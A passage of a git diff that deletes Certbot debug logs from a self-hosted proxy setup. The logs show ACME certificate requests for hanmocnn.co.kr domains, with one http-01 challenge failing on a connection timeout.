public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvBYLdUOTkkarVTTilYf8jHyGJhY1FlIsWUvBpM4NLDU2k -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:56:04Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - } - ] -} -2026-02-14 23:56:06,895:DEBUG:acme.client:Storing nonce: 4AH-2vvBYLdUOTkkarVTTilYf8jHyGJhY1FlIsWUvBpM4NLDU2k -2026-02-14 23:56:06,896:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'} -2026-02-14 23:56:09,897:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:09,901:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QllMZFVPVGtrYXJWVFRpbFlmOGpIeUdKaFkxRmxJc1dVdkJwTTROTERVMmsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0", - "signature": "pjocFNC1rCf2Jkfu67Zw3Smbc0HZTvM6bynfejd_aK7NWjRvp1EMvfO_q3cMjf0B_R1S25UEc3SdvQO25fQzspYAvn-7VY-CO29v_CVW1yoriJmh9qagA8_ooC_de9cJfhwNh2YPZwecMtGCUgB9hZjUqTE89bBjtCAFTgsdf-b37WV5DFET3KpTg29VAurpW2YmMth21ueSmxdiB-ZyxJC1j4kmVaefSilRoeUkqBeAzFX_XdPP9gvoSk5XbDL24jte1XCbgiEUloUot0qveRNkGEu_anFWbGNIKTPqUZeeb8hK-xlSmUAFP3l2_W1tFa32nLqJ0XOKKWm3Kh4EVw", - "payload": "" -} -2026-02-14 23:56:10,065:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822 -2026-02-14 23:56:10,066:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:09 GMT -Content-Type: application/json -Content-Length: 822 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGCjx_fZhQ5WDhl6vE45VknmXThsT1pOTmkYxO0Y0ehxU -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:56:04Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - } - ] -} -2026-02-14 23:56:10,066:DEBUG:acme.client:Storing nonce: NeKnt8TGCjx_fZhQ5WDhl6vE45VknmXThsT1pOTmkYxO0Y0ehxU -2026-02-14 23:56:10,066:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'} -2026-02-14 23:56:13,067:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:13,072:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0NqeF9mWmhRNVdEaGw2dkU0NVZrbm1YVGhzVDFwT1Rta1l4TzBZMGVoeFUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0", - "signature": "X4fvammVhgMxlJAAaYpyehvxOy40N9oRAHl5Ug7k032b59S1NIAjoffSB9EKi7xJ7B8SJCxU-oFwILoU1Ldm-vikMwRkEtTMIMGWMdmy3WNZD4R0nj5yodIgWh5x3W5Pxc77hcYK6tiNGAtA92Ui3kgRrkMmFlFrJN-qummEA77X2Yhmn56pcGoH5xSJooAG4WifWgRWVbYz1vsGRHDctVKaKMb5-99OBsw-QLVJ_mzMvzD73vNM7OsVNNM-tmhDq_pmyJ1a4aJQN5-7CLG9pfaaDVAxrZDHjeTsQD3MwoGQ7xY5U59h2o8rgIB8TYefEiUNBom8EMyayTYhGFGfOw", - "payload": "" -} -2026-02-14 23:56:13,236:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822 -2026-02-14 23:56:13,237:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:13 GMT -Content-Type: application/json -Content-Length: 822 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvBWmoNXqbP_G__zB5zN3RERigaNgY-khTArYZDgbv2X_k -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:56:04Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - } - ] -} -2026-02-14 23:56:13,237:DEBUG:acme.client:Storing nonce: 4AH-2vvBWmoNXqbP_G__zB5zN3RERigaNgY-khTArYZDgbv2X_k -2026-02-14 23:56:13,238:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'} -2026-02-14 23:56:16,238:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:16,243:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qldtb05YcWJQX0dfX3pCNXpOM1JFUmlnYU5nWS1raFRBcllaRGdidjJYX2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0", - "signature": "VUS-lzk9Z3loxvUEDVuMC_FAo4nIIaN6ASpX2W6ee1LV95WxuuirwwVvgC5LNneJKctrI_sZWZHmsg_gdbPaF1TVPDHoNeYy-q4CahPRRibPnTeELJ1Pwb9QB6IU-H6cSswTZLKwwerZpTWE70RElAyE4SJVniuQ9R0ZyyXqOUoYGCQDrqLTgaRyjMVi3gPrmyXAOXQGo8wxe_ptEaxaDOkyhvCXuZ1fU6TIz1HMFnBy4zIzkEbFiZlqR1dPOwJe5YPRRGgaISJyWqb9f_ksyRJWNrTAVL0tUN2fKx8bzrRmSUOr3X_O68f53h_Dda1RZ3gxmIBcxjcoAZbTR2hRHw", - "payload": "" -} -2026-02-14 23:56:16,406:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 822 -2026-02-14 23:56:16,407:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:16 GMT -Content-Type: application/json -Content-Length: 822 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvBMeztInZzGTaqtySBQba_zA2UlxHA7wD9hPW6YEGqHVc -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:56:04Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/qPZFug", - "status": "pending", - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0" - } - ] -} -2026-02-14 23:56:16,420:DEBUG:acme.client:Storing nonce: 4AH-2vvBMeztInZzGTaqtySBQba_zA2UlxHA7wD9hPW6YEGqHVc -2026-02-14 23:56:16,421:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/ma_ZVQ', 'status': 'pending', 'token': 'xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0'} -2026-02-14 23:56:19,422:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:56:19,426:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658791959956: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qk1lenRJblp6R1RhcXR5U0JRYmFfekEyVWx4SEE3d0Q5aFBXNllFR3FIVmMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4NzkxOTU5OTU2In0", - "signature": "NPoDinMY-lpRRfnPp-YkArm_aAxytG8RLCQM_eQfhXpDeelMX2mG-OwZceFZy9-wn6yWgqmKN-7RPZ3pWl_5xIAqqLIB6LAaE3nPiQkU5AfViP7KOE2WumQgLfPLtuqa73v9JD2tJpV7Lbxo-X_EidM6Rs6t9vdjTLmY7uYwFUvEb7SzpHISaehnrj8aA17I8qJgLBhGtyvHbzhnv7Nira9Lw2TWOlO1lIMgHtLMFvuyFnCzOkfEqvVTjzWN7RhKQ_WM7hj2A3XSw81N4iYhIs8E68Mg2Z8fHHu7VCrGjqgWBifEKCrOAjwieKsvb66nKsSsWSchbIo26PNfwhCXVg", - "payload": "" -} -2026-02-14 23:56:19,603:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658791959956 HTTP/1.1" 200 1065 -2026-02-14 23:56:19,603:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:56:19 GMT -Content-Type: application/json -Content-Length: 1065 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGK04pYxuaJhFJTtcVaz449MbsEz3fo4B6O33Ocq9f2Jk -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "hanmocnn.co.kr" - }, - "status": "invalid", - "expires": "2026-02-21T23:56:04Z", - "challenges": [ - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658791959956/RMxAAg", - "status": "invalid", - "validated": "2026-02-14T23:56:05Z", - "error": { - "type": "urn:ietf:params:acme:error:connection", - "detail": "221.150.111.87: Fetching http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0: Timeout during connect (likely firewall problem)", - "status": 400 - }, - "token": "xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0", - "validationRecord": [ - { - "url": "http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0", - "hostname": "hanmocnn.co.kr", - "port": "80", - "addressesResolved": [ - "221.150.111.87" - ], - "addressUsed": "221.150.111.87" - } - ] - } - ] -} -2026-02-14 23:56:19,604:DEBUG:acme.client:Storing nonce: NeKnt8TGK04pYxuaJhFJTtcVaz449MbsEz3fo4B6O33Ocq9f2Jk -2026-02-14 23:56:19,604:INFO:certbot._internal.auth_handler:Challenge failed for domain hanmocnn.co.kr -2026-02-14 23:56:19,604:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='hanmocnn.co.kr') -2026-02-14 23:56:19,604:DEBUG:certbot._internal.display.obj:Notifying user: -Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: - Identifier: hanmocnn.co.kr - Type: connection - Detail: 221.150.111.87: Fetching http://hanmocnn.co.kr/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0: Timeout during connect (likely firewall problem) - -Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. - -2026-02-14 23:56:19,606:DEBUG:certbot._internal.error_handler:Encountered exception: -Traceback (most recent call last): - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations - self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations - raise errors.AuthorizationError('Some challenges have failed.') -certbot.errors.AuthorizationError: Some challenges have failed. - -2026-02-14 23:56:19,606:DEBUG:certbot._internal.error_handler:Calling registered functions -2026-02-14 23:56:19,606:INFO:certbot._internal.auth_handler:Cleaning up challenges -2026-02-14 23:56:19,606:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/xkIyiwPR05xCsWzX1FwjuScamt7xv48i0-y0jpW1xI0 -2026-02-14 23:56:19,607:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up -2026-02-14 23:56:19,607:DEBUG:certbot._internal.log:Exiting abnormally: -Traceback (most recent call last): - File "/opt/certbot/bin/certbot", line 6, in - sys.exit(main()) - ^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main - return internal_main.main(cli_args) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1886, in main - return config.func(config, plugins) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1598, in certonly - lineage = _get_and_save_cert(le_client, config, sans, certname, lineage) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 143, in _get_and_save_cert - lineage = le_client.obtain_and_enroll_certificate(sans, certname) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 533, in obtain_and_enroll_certificate - cert, chain, key, _ = self.obtain_certificate(sans) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 434, in obtain_certificate - orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 512, in _get_order_and_authorizations - authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) - ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations - self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) - File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations - raise errors.AuthorizationError('Some challenges have failed.') -certbot.errors.AuthorizationError: Some challenges have failed. -2026-02-14 23:56:19,610:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/npm/data/logs/letsencrypt.log.3 b/npm/data/logs/letsencrypt.log.3 deleted file mode 100644 index bcd828f..0000000 --- a/npm/data/logs/letsencrypt.log.3 +++ /dev/null @@ -1,820 +0,0 @@ -2026-02-14 23:36:10,097:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-4', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'mail.hanmocnn.co.kr'] -2026-02-14 23:36:10,098:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-14 23:36:10,111:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-14 23:36:10,113:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-14 23:36:10,114:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-14 23:36:10,346:DEBUG:certbot._internal.main:Picked account: -2026-02-14 23:36:10,347:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-14 23:36:10,350:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-14 23:36:10,925:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-14 23:36:10,926:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:10 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "gl0y9KAY6WE": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-14 23:36:10,927:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for mail.hanmocnn.co.kr -2026-02-14 23:36:10,931:DEBUG:acme.client:Requesting fresh nonce -2026-02-14 23:36:10,931:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-14 23:36:11,106:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-14 23:36:11,106:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:11 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfyjd0yzrV6j-gWFKMfQxcQwKY8xlPoqJkffKPGd6xz5E -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-14 23:36:11,107:DEBUG:acme.client:Storing nonce: QkEzerAfyjd0yzrV6j-gWFKMfQxcQwKY8xlPoqJkffKPGd6xz5E -2026-02-14 23:36:11,107:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "mail.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-14 23:36:11,113:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnlqZDB5enJWNmotZ1dGS01mUXhjUXdLWTh4bFBvcUprZmZLUEdkNnh6NUUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "hS7qYt3RRHk1LAi7encEP5ydfY_ml4lMwYzddNWa9F1GJArk2rOQNDaTiZhtZ54ZHgTnFSXD1iaXFNxjKuYOQYmXQQIXHDK3suCaoZvEOTJzneL_V4Vpvq9ai2erj0lgXDDn3h1vy7hmXgYrhVH8FtXENrl17vR1wpu9z2_LHEBd2WDhnD9rZtG14yvstb3WXrTFd32H0UbBLVEiiMvy7rNPUWS_DP-v2HU7MQqbmYfLV5IyMINr8hANSrb-AeygAnnORl2maALqklOsh9qLximoeeNPjQqxn3zi00BCo8vdC6ni2OeYq51NOpEMZx1W4aRKIA0Vl32snJ10d155pQ", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogIm1haWwuaGFubW9jbm4uY28ua3IiCiAgICB9CiAgXQp9" -} -2026-02-14 23:36:11,401:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 353 -2026-02-14 23:36:11,402:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:11 GMT -Content-Type: application/json -Content-Length: 353 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480370643826 -Replay-Nonce: QkEzerAftIzsnOAR6XedceVkroV5M0_zuPRMcd9TlS3shn1CkbU -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "identifiers": [ - { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826" -} -2026-02-14 23:36:11,402:DEBUG:acme.client:Storing nonce: QkEzerAftIzsnOAR6XedceVkroV5M0_zuPRMcd9TlS3shn1CkbU -2026-02-14 23:36:11,402:DEBUG:acme.client:JWS payload: -b'' -2026-02-14 23:36:11,407:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnRJenNuT0FSNlhlZGNlVmtyb1Y1TTBfenVQUk1jZDlUbFMzc2huMUNrYlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0", - "signature": "VIIB53BtybPvpHqUpW6dcUf6xjmhnnx3o-qgX79kka0gM8YwirNDwgke5h9pZql7yBIkATNixyK4HCWvVlecC3MN0IkEJ53oyxZcaGfXt2QAU9i6oACnB6t-w9wBMDMnrgEUx5Li_JCkSUINfugXzI-7MOKx7p5CUBP-mYdJig3tOmJ4JGw16RO1JkSTTZdGJPWfsP5m3EE-PBXzhZpPiHtQsl_UnTKMOa87ZZx6I7W8vEOFnvkNZEoDtchZ1sUqvVHJ3ZE_eNcmvzFUaoGVuntO6FFXNZ3O9muh8G-WwvJ1bnvsvCfTqu97T-aFcMylqrcyexkH4v83QZyNqBTfvA", - "payload": "" -} -2026-02-14 23:36:11,656:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827 -2026-02-14 23:36:11,657:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sat, 14 Feb 2026 23:36:11 GMT -Content-Type: application/json -Content-Length: 827 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: QkEzerAfnau7eqIPQLWPi5a5DIy_NF1ZI7xZf78WAZQj3BB2Jmc -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "mail.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-21T23:36:11Z", - "challenges": [ - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw", - "status": "pending", - "token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA", - "status": "pending", - "token": 